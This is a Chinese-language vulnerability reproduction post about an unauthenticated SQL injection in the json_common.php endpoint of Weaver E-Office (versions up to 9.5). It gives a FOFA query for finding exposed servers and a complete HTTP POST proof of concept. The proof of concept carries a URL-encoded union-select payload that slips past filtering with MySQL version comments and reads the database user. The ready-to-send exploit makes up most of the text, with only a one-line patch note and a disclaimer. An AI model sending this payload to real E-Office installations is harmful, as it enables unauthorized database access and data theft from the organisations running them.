前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
二、漏洞描述
泛微E-office的json_common.php接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用此漏洞获取数据库中的信息
三、影响范围
e-office <=9.5
四、复现环境
FOFA:app=“泛微-EOffice”
五、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC
POST /building/json_common.php HTTP/1.1
Host: ip-port
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 188
tfs=city%60%20where%20cityId%20%3D%2D1%20%2F%2A%2150000union%2A%2F%20%2F%2A%2150000all%2A%2F%20%2F%2A%2150000select%2A%2F%201%2C2%2C%28%2F%2A%2150000select%2A%2F%20user%28%29%29%2C4%23%7C2
3.成功
六、修复建议
厂商已经发布修复补丁,请及时更新
https://www.e-office.cn/
参考链接
https://blog.csdn.net/qq_41904294/article/details/134675267